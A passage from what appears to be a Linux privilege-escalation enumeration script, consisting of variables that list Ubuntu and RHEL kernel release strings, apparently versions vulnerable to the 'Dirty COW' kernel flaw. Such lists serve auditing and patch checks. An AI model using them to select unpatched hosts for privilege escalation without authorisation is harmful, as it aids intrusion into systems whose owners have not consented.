pae|3.2.0-35-virtual" 939 kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic" 940 kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic" 941 kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic" 942 kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic" 943 kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency" 944 kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic" 945 kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic" 946 kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" 947 kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" 948 kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5" 949 kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5" 950 kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5" 951 kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.58-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6" 952 kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6" 953 kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.111.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6" 954 kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6" 955 kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.